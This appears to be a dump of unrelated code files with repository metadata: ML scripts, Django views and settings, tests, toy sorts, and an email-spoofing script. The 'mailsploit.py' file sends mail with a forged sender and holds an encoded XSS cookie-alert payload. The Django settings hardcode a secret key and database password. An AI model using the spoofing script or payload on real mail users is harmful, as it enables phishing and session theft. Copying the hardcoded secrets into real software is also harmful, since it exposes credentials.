graph.append('conv1_wmd', int_test.permute, 'conv1_wmd_')
graph.append('conv1_wmh_', int_test.mul, 'conv1_wh', 'conv1_mh')
graph.append('conv1_wmh', int_test.permute_vh, 'conv1_wmh_')
graph.append('conv1_wmv_', int_test.mul, 'conv1_wv', 'conv1_mv')
graph.append('conv1_wmv', int_test.permute_vh, 'conv1_wmv_')
graph.append('conv2_w', weight)
graph.append('conv2_m', weight)
graph.append('conv2_wm_', int_test.mul, 'conv2_w', 'conv2_m')
graph.append('conv2_wm', int_test.permute, 'conv2_wm_')
graph.append('conv2_b', weight)
graph.append('fc1_wh', weight)
graph.append('fc1_mh', weight)
graph.append('fc1_wv', weight)
graph.append('fc1_mv', weight)
graph.append('fc1_b', weight)
graph.append('fc1_wmh__', int_test.mul, 'fc1_wh', 'fc1_mh')
graph.append('fc1_wmh_', int_test.transpose, 'fc1_wmh__')
graph.append('fc1_wmh', int_test.shuffle, 'fc1_wmh_')
graph.append('fc1_wmv_', int_test.mul, 'fc1_wv', 'fc1_mv')
graph.append('fc1_wmv', int_test.transpose, 'fc1_wmv_')
graph.append('fc2_w', weight)
graph.append('fc2_wt', int_test.transpose, 'fc2_w')
graph.append('fc2_b', weight)
write_header('input', [
('input', graph.eval('input_reshape'), 'FC', False)])
write_header('conv1', [
('conv1_wmd', graph.eval('conv1_wmd'), 'CONV', True),
('conv1_wmh', graph.eval('conv1_wmh'), 'CONV', True),
('conv1_wmv', graph.eval('conv1_wmv'), 'CONV', True),
('conv1_b', graph.eval('conv1_b'), 'FC', False)])
write_header('conv2', [
('conv2_wm', graph.eval('conv2_wm'), 'CONV', True),
('conv2_b', graph.eval('conv2_b'), 'FC', False)])
write_header('fc1', [
('fc1_wmh', graph.eval('fc1_wmh'), 'FC', True),
('fc1_wmv', graph.eval('fc1_wmv'), 'FC', True),
('fc1_b', graph.eval('fc1_b'), 'FC', False)])
write_header('fc2', [
('fc2_w', graph.eval('fc2_wt'), 'FC', False),
('fc2_b', graph.eval('fc2_b'), 'FC', False)])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--param_dir',
type=str,
help='Parameter directory')
parser.add_argument(
'--header_dir',
type=str,
help='Header directory')
args = parser.parse_args()
main(args)
|
[
"ggobieski@yahoo.com"
] |
ggobieski@yahoo.com
|
784757326adf4e45de7713243d4dd51030312413
|
6437af616b0752b24e1b62bc98d302b2e04a7c85
|
/pagnition/supplier/a1toys.com/pagination.py
|
b7947798a03944b1fa429b9122e992f170ec3c8d
|
[] |
no_license
|
kangqiwang/imageWebCrawler
|
4c7ebc0c93fd52b27f08a0f79302885d95f53a6e
|
76fe21802a5a03638e324e6d18fe5698a69aba70
|
refs/heads/master
| 2022-05-31T00:51:39.649907
| 2019-08-28T15:06:37
| 2019-08-28T15:06:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd
import numpy as np
import requests
def pagnition():
df=pd.read_csv("pagnition/input/a1toys_com.csv",usecols=['Category URL','Product Count'])
tmpList=['url']
for url, count in zip(df['Category URL'],df['Product Count']):
urltmp=''
numbertmp=0
# if "categories/" in str(url):
# urltmp = url.split("categories/")[0]
# numbertmp=url.split("categories/")[1]
perpageCount=20
pageNum=int(count/perpageCount)+1
for i in range(pageNum):
# if urltmp !='':
urltmp = url+'&p='+str(i)
# else:
# tmpurl = url +'?Nao='+str(21*(i+1))+'&Ns=None&storeSelection=2408,2414,2409,2407,2404'
print(urltmp)
tmpList.append(urltmp)
savedf=pd.Series(tmpList)
savedf.to_csv("pagnition/output/a1toys_com.csv",index=False)
pagnition()
|
[
"kang@sourcemogul.com"
] |
kang@sourcemogul.com
|
e7102e8a75f1b70c301e29ea4054d292404bf23c
|
709bd5f2ecc69a340da85f6aed67af4d0603177e
|
/tests/test_analytics.py
|
d6818e163a670b22b8bcf46edc578302d57d81ae
|
[
"BSD-3-Clause"
] |
permissive
|
Kenstogram/opensale
|
41c869ee004d195bd191a1a28bf582cc6fbb3c00
|
5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba
|
refs/heads/master
| 2022-12-15T02:48:48.810025
| 2020-03-10T02:55:10
| 2020-03-10T02:55:10
| 163,656,395
| 8
| 0
|
BSD-3-Clause
| 2022-12-08T01:31:09
| 2018-12-31T09:30:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,647
|
py
|
from decimal import Decimal
from saleor.core.analytics import (
get_order_payloads, get_view_payloads, report_order, report_view)
def test_get_order_payloads(order_with_lines):
order = order_with_lines
generator = get_order_payloads(order)
data = list(generator)
assert len(data) == order.lines.count() + 1
transaction = data[0]
assert transaction['ti'] == order.pk
assert transaction['cu'] == order.total.currency
assert Decimal(transaction['tr']) == order.total.gross.amount
assert Decimal(transaction['tt']) == order.total.tax.amount
assert Decimal(transaction['ts']) == order.shipping_price.net.amount
for i, line in enumerate(order):
item = data[i + 1]
assert item['ti'] == order.pk
assert item['in'] == line.product_name
assert item['ic'] == line.product_sku
assert item['iq'] == str(int(line.quantity))
assert item['cu'] == line.unit_price.currency
assert Decimal(item['ip']) == line.unit_price.gross.amount
def test_report_order_has_no_errors(order_with_lines):
report_order('', order_with_lines)
def test_get_view_payloads():
headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
generator = get_view_payloads('/test-path/', 'en-us', headers)
data = list(generator)[0]
assert data['dp'] == '/test-path/'
assert data['dh'] == 'getsaleor.com'
assert data['dr'] == 'example.com'
assert data['ul'] == 'en-us'
def test_report_view_has_no_errors():
headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
report_view('', '/test-path/', 'en-us', headers)
|
[
"Kenstogram@gmail.com"
] |
Kenstogram@gmail.com
|
5129f315bcfc269da60e35fe27be4f23c66a4b73
|
e80b42fbc5f109f3979537a980eb4ea12668579e
|
/anagram/anagram1.py
|
c1dea94a1aa3c2e88e750d66c2a74340d3cfbb68
|
[] |
no_license
|
iliefa/pythontries
|
63bc38042797a47407a0e99a0c20816a8710027b
|
7ee793c6a248bc98da495d5936290c476bf4d77c
|
refs/heads/master
| 2020-11-25T11:13:46.212549
| 2019-12-18T11:56:08
| 2019-12-18T11:56:08
| 228,633,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
test_list = [10,4,5,8,11]
print("original list"+ str(test_list))
flag = 0
test_list1 = test_list[:]
test_list1.sort()
if (test_list1 == test_list):
flag = 1
if (flag):
print("list is sorted")
else :
print("list is not sorted")
|
[
"andrei.ilief@orange.com"
] |
andrei.ilief@orange.com
|
030b9637a9a4ea51407b961085ffa343a2134707
|
52d000f6dddcc3cf22f7418a6d116d713e8e7d13
|
/count_sort.py
|
b1ba373fbc583cb28dcd390db53a1f2425c3253b
|
[] |
no_license
|
TianyiY/Sort_Algorithms
|
8317e8f71b0ae2ca3692977e9d4ebe82aaecb28d
|
a21ced94b05d8d808cf51d2d6bab158a5b3fbf13
|
refs/heads/master
| 2021-01-19T07:12:58.901291
| 2019-01-25T01:44:25
| 2019-01-25T01:44:25
| 95,682,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
def count_sort(list):
import numpy
minimum=numpy.inf
maximum=0
# retrieve the min and max value
for i in list:
if i < minimum:
minimum=i
if i > maximum:
maximum=i
count_list=[0]*(maximum-minimum+1)
for i in list:
count_list[i-minimum]+=1
index=0
for i in range(maximum-minimum+1):
for j in range(count_list[i]):
list[index]=i+minimum
index+=1
return list
print count_sort([49, 38, 65, 97, 76, 13, 27, 49, 78, 34, 12, 64, 5, 4, 62, 99, 98, 54, 56, 17, 18, 23, 34, 15, 35, 25, 53, 51, 111, 123, 234, 321, 245, 543, 126, 160, 156, 451, 156])
|
[
"noreply@github.com"
] |
noreply@github.com
|
987a83e80e30dcd1ceb4d43b399649ee7698b706
|
c81ae49611329f79992054fd0c4a3a1df12cc6a1
|
/ml-library/main.py
|
8418089057aa1ff73029c72d0801fd8ddde18cf4
|
[] |
no_license
|
ce-itcr/CE5508-laboratorio-git
|
954e4fcba5a529bcb433c008f80ff3b29ebcf241
|
e4bbafe254c015cbaf4f4c741e9874e9561308fa
|
refs/heads/main
| 2023-07-12T07:52:47.095162
| 2021-08-19T04:17:26
| 2021-08-19T04:17:26
| 397,759,614
| 0
| 0
| null | 2021-08-19T04:17:27
| 2021-08-18T23:26:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 55
|
py
|
print('Hello World!')
print('PT001 - Test with hooks')
|
[
"angelo2898@gmail.com"
] |
angelo2898@gmail.com
|
b55643fcff23f3cfd287575893b92be9ceb28574
|
017493ea878a39b877c7f6801af98caa1e3feb97
|
/Python/09 - Errors and Exceptions/Incorrect Regex.py
|
4482874ad187786d9c69f145bc3f65df2d8d57c0
|
[
"MIT"
] |
permissive
|
BHAVJOT14/HackerRank-Solutions
|
569b15738b7baed987bf4719e8f89239faed191e
|
8fe0280f5ce150a28598be71dc7ab6f06318e4d5
|
refs/heads/main
| 2023-07-16T09:52:48.955592
| 2021-09-07T16:00:22
| 2021-09-07T16:00:22
| 394,179,235
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
import re
for i in range(int(input())):
try:
a = re.compile(input())
print("True")
except Exception:
print("False")
|
[
"68502679+bhavi140201@users.noreply.github.com"
] |
68502679+bhavi140201@users.noreply.github.com
|
87c3f5e9e98139684c31bf71c78d561487e8ea87
|
51ddc39b5427404836547612c7bed86ab6b1ba67
|
/courses/views.py
|
075b1fb61a43ea56ed4d4f2407d7c6655c1f8e52
|
[] |
no_license
|
alex-run-code/educa
|
17931e02d7a08a5bd4fa65ce3a6aa5614388aca8
|
bbb4b42f816d9c4ff378beb215de6291b8e59448
|
refs/heads/main
| 2023-01-29T16:33:07.706400
| 2020-12-15T10:48:11
| 2020-12-15T10:48:11
| 319,874,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,557
|
py
|
from django.shortcuts import render
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .models import Course
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.shortcuts import redirect, get_object_or_404
from django.views.generic.base import TemplateResponseMixin, View
from .forms import ModuleFormSet
from django.forms.models import modelform_factory
from django.apps import apps
from .models import Module, Content
from braces.views import CsrfExemptMixin, JsonRequestResponseMixin
from django.db.models import Count
from .models import Subject
from students.forms import CourseEnrollForm
class ContentCreateUpdateView(TemplateResponseMixin, View):
module = None
model = None
obj = None
template_name = 'courses/manage/content/form.html'
def get_model(self, model_name):
if model_name in ['text', 'video', 'image', 'file']:
return apps.get_model(app_label='courses', model_name=model_name)
return None
def get_form(self, model, *args, **kwargs):
Form = modelform_factory(model, exclude=['owner',
'order',
'created',
'updated'])
return Form(*args, **kwargs)
def dispatch(self, request, module_id, model_name, id=None):
print('1')
self.module = get_object_or_404(Module, id=module_id, course__owner=request.user)
print('2')
self.model = self.get_model(model_name)
if id:
self.obj = get_object_or_404(self.model, id=id, owner=request.user)
return super(ContentCreateUpdateView, self).dispatch(request, module_id, model_name, id)
def get(self, request, module_id, model_name, id=None):
form = self.get_form(self.model, instance=self.obj)
return self.render_to_response({'form':form,
'object':self.obj})
def post(self, request, module_id, model_name, id=None):
form = self.get_form(self.model, instance=self.obj,
data=request.POST,
files=request.FILES)
if form.is_valid():
obj = form.save(commit=False)
obj.owner = request.user
obj.save()
if not id:
# new content
Content.objects.create(module=self.module, item=obj)
return redirect('module_content_list', self.module.id)
return self.render_to_response({'form': form,
'object': self.obj})
class ContentDeleteView(View):
def post(self, request, id):
content = get_object_or_404(Content, id=id, module__course__owner=request.user)
module = content.module
content.item.delete()
content.delete()
return redirect('module_content_list', module.id)
class OwnerMixin(object):
def get_queryset(self):
qs = super(OwnerMixin, self).get_queryset()
return qs.filter(owner=self.request.user)
class OwnerEditMixin(object):
def form_valid(self, form):
form.instance.owner = self.request.user
return super(OwnerEditMixin, self).form_valid(form)
class OwnerCourseMixin(OwnerMixin, LoginRequiredMixin):
model = Course
fields = ['subject','title','slug','overview']
success_url = reverse_lazy('manage_course_list')
class OwnerCourseEditMixin(OwnerCourseMixin, OwnerEditMixin):
fields = ['subject', 'title', 'slug', 'overview']
success_url = reverse_lazy('manage_course_list')
template_name = 'courses/manage/course/form.html'
class ManageCourseListView(OwnerCourseMixin, ListView):
template_name = 'courses/manage/course/list.html'
class CourseCreateView(PermissionRequiredMixin, OwnerCourseEditMixin, CreateView):
permission_required = 'courses.add_course'
class CourseUpdateView(PermissionRequiredMixin, OwnerCourseEditMixin, UpdateView):
template_name = 'courses/manage/course/form.html'
permission_required = 'courses.change_course'
class CourseDeleteView(PermissionRequiredMixin, OwnerCourseMixin, DeleteView):
template_name = 'courses/manage/course/delete.html'
success_url = reverse_lazy('manage_course_list')
permission_required = 'courses.delete_course'
class CourseModuleUpdateView(TemplateResponseMixin, View):
template_name = 'courses/manage/module/formset.html'
course = None
def get_formset(self, data=None):
return ModuleFormSet(instance=self.course,
data=data)
def dispatch(self, request, pk):
self.course = get_object_or_404(Course, id=pk, owner=request.user)
return super(CourseModuleUpdateView, self).dispatch(request, pk)
def get(self, request, *args, **kwargs):
formset = self.get_formset()
return self.render_to_response({'course':self.course,
'formset':formset})
def post(self, request, *args, **kwargs):
formset = self.get_formset(data=request.POST)
if formset.is_valid():
formset.save()
return redirect('manage_course_list')
return self.render_to_response({'course':self.course,
'formset':formset})
class ModuleContentListView(TemplateResponseMixin, View):
template_name = 'courses/manage/module/content_list.html'
def get(self, request, module_id):
module = get_object_or_404(Module,
id=module_id,
course__owner=request.user)
return self.render_to_response({'module':module})
class ModuleOrderView(CsrfExemptMixin, JsonRequestResponseMixin, View):
def post(self, request):
for id, order in self.request_json.items():
Module.objects.filter(id=id, course__owner=request.user).update(order=order)
return self.render_json_response({'saved':'OK'})
class ContentOrderView(CsrfExemptMixin, JsonRequestResponseMixin, View):
def post(self, request):
for id, order in self.request_json.items():
Content.objects.filter(id=id, module__course__owner=request.user) \
.update(order=order)
return self.render_json_response({'saved':'OK'})
class CourseListView(TemplateResponseMixin, View):
model = Course
template_name = 'courses/course/list.html'
def get(self, request, subject=None):
subjects = Subject.objects.annotate(total_courses=Count('courses'))
courses = Course.objects.annotate(total_modules=Count('modules'))
if subject:
subject = get_object_or_404(Subject, slug=subject)
courses = courses.filter(subject=subject)
return self.render_to_response({'subjects': subjects,
'subject': subject,
'courses': courses})
class CourseDetailView(DetailView):
model = Course
template_name = 'courses/course/detail.html'
def get_context_data(self, **kwargs):
context = super(CourseDetailView, self).get_context_data(**kwargs)
context['enroll_form'] = CourseEnrollForm(initial={'course':self.object})
return context
|
[
"acambefort@pentalog.com"
] |
acambefort@pentalog.com
|
b0183013bf5ccd8486f76a0a40e1385241afaec7
|
2fc31334b2996b8bdfb6ef0b71a1d5c0efd1e4ed
|
/mailsploit.py
|
a6ee28d813a25032a4b94ee9db4bda70e73251c7
|
[] |
no_license
|
shorti1996/mailsploit_me
|
6538a30a0199b4ef8b9cad0ade8fbdd50ab6a670
|
b042f613af7b8b944ee24975b3406aab8a76e828
|
refs/heads/master
| 2021-05-06T04:19:47.791260
| 2020-02-03T11:57:19
| 2020-02-03T11:57:19
| 114,993,158
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
import smtplib
from lazyme.string import color_print
from vals import nato_example
spoofed_display_name = "עבריתעבריתעבריתעבריתעברית"
# spoofed_display_name = "gowno"
# spoofed_from = "=?utf-8?b?c2VydmljZUBwYXlwYWwuY29tPGlmcmFtZSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSBzcmM9aHR0cHM6Ly93d3cuaHVzaG1haWwuY29tIHN0eWxlPSJkaXNwbGF5Om5vbmUi?==?utf-8?Q?=0A=00?=@mailsploit.com"
spoofed_from = "aaaa@pwr.edu.pl"
email_to = 'wliebert0116@gems.sw.rim.net'
msg = """From: \"%s\" <%s>
To: %s
Subject: Test RTL\n
sdadasdasa
Test test
""" % (spoofed_display_name, spoofed_from, email_to)
msg = msg.encode()
SMTP_user = 'user@localhost'
SMTP_password = 'user'
server = None
try:
server = smtplib.SMTP('localhost', 25)
server.ehlo() # optional
except:
color_print('Can\'t connect to SMTP', color='blue')
server.set_debuglevel(1)
try:
server.login(SMTP_user, SMTP_password)
except:
color_print('Can\'t authenticate with the server', color='blue')
try:
server.sendmail(spoofed_from, [email_to], msg)
except:
color_print('Can\'t send an email', color='blue')
server.quit()
|
[
"shorti1996@gmail.com"
] |
shorti1996@gmail.com
|
4ae396cd061bc5d5104ddaff784f3ffe16673c89
|
32402ec0fb7cece6a4b7f64524f45196db48b8c6
|
/fmd_track/fmd_track/settings.py
|
b33acef3bddac9c0bd343e008d13abf11065c203
|
[] |
no_license
|
ArtyomMinsk/FMD_records
|
2a12c85211cdf93144bc1c1498bdfbf4cca94296
|
2bea82483b11de422f7bededc2a12d8211197c2c
|
refs/heads/master
| 2021-01-22T08:28:14.560321
| 2017-02-28T20:54:22
| 2017-02-28T20:54:22
| 81,902,019
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,212
|
py
|
"""
Django settings for fmd_track project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd%@!p0w6906t^bo96rm@5%hk6-!dj8=_ib5=&o&7dc62=$y=gc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'fmd.apps.FmdConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fmd_track.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fmd_track.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'fmd_db',
'USER': 'Artyom',
'PASSWORD': 'sfi',
'HOST': '127.0.0.1',
'PORT': '5433',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"artem.nesterenko@gmail.com"
] |
artem.nesterenko@gmail.com
|
51a44f03eb696ececa3a9e650a63d3177d62f625
|
976a21364b7c54e7bccddf1c9deec74577ce8bb8
|
/build/rob_control/catkin_generated/pkg.develspace.context.pc.py
|
ae505c4d62a69cc0f460001a4541d25f31f1d6e7
|
[] |
no_license
|
jinweikim/catkin_ws
|
f0168b17c04863a6e5472f6199a4a9c525e0f3aa
|
268ce7e348a162019e90d0e4527de4c9140ac0f8
|
refs/heads/master
| 2023-01-02T17:23:06.834527
| 2020-10-23T12:03:49
| 2020-10-23T12:03:49
| 262,527,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "actionlib_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rob_control"
PROJECT_SPACE_DIR = "/home/jinwei/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
|
[
"jinweikim@gmail.com"
] |
jinweikim@gmail.com
|
2b6b9fdb0f744756e2cee975230f11c0238b45ea
|
31a928cff4960236923b6bc3b68e34bb2f46f470
|
/sparse-evolutionary-artificial-neural-networks/SET-MLP-Keras-Weights-Mask/set_mlp_keras_cifar10.py
|
1a61f24283ff805b0be5792da50162cb6b2a6831
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
webclinic017/ml_monorepo
|
707df2afd2f986eb0721d26430e6135c917817c6
|
945f0a83d6b94282c547bb6f4805f3381ad9c16a
|
refs/heads/master
| 2021-10-19T21:02:53.322944
| 2019-02-19T20:58:51
| 2019-02-23T20:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,286
|
py
|
# Author: Decebal Constantin Mocanu et al.;
# Proof of concept implementation of Sparse Evolutionary Training (SET) of Multi Layer Perceptron (MLP) on CIFAR10 using Keras and a mask over weights.
# This implementation can be used to test SET in varying conditions, using the Keras framework versatility, e.g. various optimizers, activation layers, tensorflow
# Also it can be easily adapted for Convolutional Neural Networks or other models which have dense layers
# However, due the fact that the weights are stored in the standard Keras format (dense matrices), this implementation can not scale properly.
# If you would like to build and SET-MLP with over 100000 neurons, please use the pure Python implementation from the folder "SET-MLP-Sparse-Python-Data-Structures"
# This is a pre-alpha free software and was tested with Python 3.5.2, Keras 2.1.3, Keras_Contrib 0.0.2, Tensorflow 1.5.0, Numpy 1.14;
# The code is distributed in the hope that it may be useful, but WITHOUT ANY WARRANTIES; The use of this software is entirely at the user's own risk;
# For an easy understanding of the code functionality please read the following articles.
# If you use parts of this code please cite the following articles:
#@article{Mocanu2018SET,
# author = {Mocanu, Decebal Constantin and Mocanu, Elena and Stone, Peter and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio},
# journal = {Nature Communications},
# title = {Scalable Training of Artificial Neural Networks with Adaptive Sparse Connectivity inspired by Network Science},
# year = {2018},
# doi = {10.1038/s41467-018-04316-3}
#}
#@Article{Mocanu2016XBM,
#author="Mocanu, Decebal Constantin and Mocanu, Elena and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio",
#title="A topological insight into restricted Boltzmann machines",
#journal="Machine Learning",
#year="2016",
#volume="104",
#number="2",
#pages="243--270",
#doi="10.1007/s10994-016-5570-z",
#url="https://doi.org/10.1007/s10994-016-5570-z"
#}
#@phdthesis{Mocanu2017PhDthesis,
#title = "Network computations in artificial intelligence",
#author = "D.C. Mocanu",
#year = "2017",
#isbn = "978-90-386-4305-2",
#publisher = "Eindhoven University of Technology",
#}
from __future__ import division
from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras import optimizers
import numpy as np
from keras import backend as K
from keras_contrib.layers.advanced_activations import SReLU
from keras.datasets import cifar10
from keras.utils import np_utils
class Constraint(object):
def __call__(self, w):
return w
def get_config(self):
return {}
class MaskWeights(Constraint):
def __init__(self, mask):
self.mask = mask
self.mask = K.cast(self.mask, K.floatx())
def __call__(self, w):
w *= self.mask
return w
def get_config(self):
return {'mask': self.mask}
def find_first_pos(array, value):
idx = (np.abs(array - value)).argmin()
return idx
def find_last_pos(array, value):
idx = (np.abs(array - value))[::-1].argmin()
return array.shape[0] - idx
def createWeightsMask(epsilon,noRows, noCols):
# generate an Erdos Renyi sparse weights mask
mask_weights = np.random.rand(noRows, noCols)
prob = 1 - (epsilon * (noRows + noCols)) / (noRows * noCols) # normal tp have 8x connections
mask_weights[mask_weights < prob] = 0
mask_weights[mask_weights >= prob] = 1
noParameters = np.sum(mask_weights)
print ("Create Sparse Matrix: No parameters, NoRows, NoCols ",noParameters,noRows,noCols)
return [noParameters,mask_weights]
class SET_MLP_CIFAR10:
def __init__(self):
# set model parameters
self.epsilon = 20 # control the sparsity level as discussed in the paper
self.zeta = 0.3 # the fraction of the weights removed
self.batch_size = 100 # batch size
self.maxepoches = 1000 # number of epochs
self.learning_rate = 0.01 # SGD learning rate
self.num_classes = 10 # number of classes
self.momentum=0.9 # SGD momentum
# generate an Erdos Renyi sparse weights mask for each layer
[self.noPar1, self.wm1] = createWeightsMask(self.epsilon,32 * 32 *3, 4000)
[self.noPar2, self.wm2] = createWeightsMask(self.epsilon,4000, 1000)
[self.noPar3, self.wm3] = createWeightsMask(self.epsilon,1000, 4000)
# initialize layers weights
self.w1 = None
self.w2 = None
self.w3 = None
self.w4 = None
# initialize weights for SReLu activation function
self.wSRelu1 = None
self.wSRelu2 = None
self.wSRelu3 = None
# create a SET-MLP model
self.create_model()
# train the SET-MLP model
self.train()
def create_model(self):
# create a SET-MLP model for CIFAR10 with 3 hidden layers
self.model = Sequential()
self.model.add(Flatten(input_shape=(32, 32, 3)))
self.model.add(Dense(4000, name="sparse_1",kernel_constraint=MaskWeights(self.wm1),weights=self.w1))
self.model.add(SReLU(name="srelu1",weights=self.wSRelu1))
self.model.add(Dropout(0.3))
self.model.add(Dense(1000, name="sparse_2",kernel_constraint=MaskWeights(self.wm2),weights=self.w2))
self.model.add(SReLU(name="srelu2",weights=self.wSRelu2))
self.model.add(Dropout(0.3))
self.model.add(Dense(4000, name="sparse_3",kernel_constraint=MaskWeights(self.wm3),weights=self.w3))
self.model.add(SReLU(name="srelu3",weights=self.wSRelu3))
self.model.add(Dropout(0.3))
self.model.add(Dense(self.num_classes, name="dense_4",weights=self.w4)) #please note that there is no need for a sparse output layer as the number of classes is much smaller than the number of input hidden neurons
self.model.add(Activation('softmax'))
def rewireMask(self,weights, noWeights):
# rewire weight matrix
# remove zeta largest negative and smallest positive weights
values = np.sort(weights.ravel())
firstZeroPos = find_first_pos(values, 0)
lastZeroPos = find_last_pos(values, 0)
largestNegative = values[int((1-self.zeta) * firstZeroPos)]
smallestPositive = values[int(min(values.shape[0] - 1, lastZeroPos +self.zeta * (values.shape[0] - lastZeroPos)))]
rewiredWeights = weights.copy();
rewiredWeights[rewiredWeights > smallestPositive] = 1;
rewiredWeights[rewiredWeights < largestNegative] = 1;
rewiredWeights[rewiredWeights != 1] = 0;
weightMaskCore = rewiredWeights.copy()
# add zeta random weights
nrAdd = 0
noRewires = noWeights - np.sum(rewiredWeights)
while (nrAdd < noRewires):
i = np.random.randint(0, rewiredWeights.shape[0])
j = np.random.randint(0, rewiredWeights.shape[1])
if (rewiredWeights[i, j] == 0):
rewiredWeights[i, j] = 1
nrAdd += 1
return [rewiredWeights, weightMaskCore]
def weightsEvolution(self):
# this represents the core of the SET procedure. It removes the weights closest to zero in each layer and add new random weights
self.w1 = self.model.get_layer("sparse_1").get_weights()
self.w2 = self.model.get_layer("sparse_2").get_weights()
self.w3 = self.model.get_layer("sparse_3").get_weights()
self.w4 = self.model.get_layer("dense_4").get_weights()
self.wSRelu1 = self.model.get_layer("srelu1").get_weights()
self.wSRelu2 = self.model.get_layer("srelu2").get_weights()
self.wSRelu3 = self.model.get_layer("srelu3").get_weights()
[self.wm1, self.wm1Core] = self.rewireMask(self.w1[0], self.noPar1)
[self.wm2, self.wm2Core] = self.rewireMask(self.w2[0], self.noPar2)
[self.wm3, self.wm3Core] = self.rewireMask(self.w3[0], self.noPar3)
self.w1[0] = self.w1[0] * self.wm1Core
self.w2[0] = self.w2[0] * self.wm2Core
self.w3[0] = self.w3[0] * self.wm3Core
def train(self):
# read CIFAR10 data
[x_train,x_test,y_train,y_test]=self.read_data()
#data augmentation
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)
width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
horizontal_flip=True, # randomly flip images
vertical_flip=False) # randomly flip images
datagen.fit(x_train)
self.model.summary()
# training process in a for loop
self.accuracies_per_epoch=[]
for epoch in range(0,self.maxepoches):
sgd = optimizers.SGD(lr=self.learning_rate, momentum=self.momentum)
self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
historytemp = self.model.fit_generator(datagen.flow(x_train, y_train,
batch_size=self.batch_size),
steps_per_epoch=x_train.shape[0]//self.batch_size,
epochs=epoch,
validation_data=(x_test, y_test),
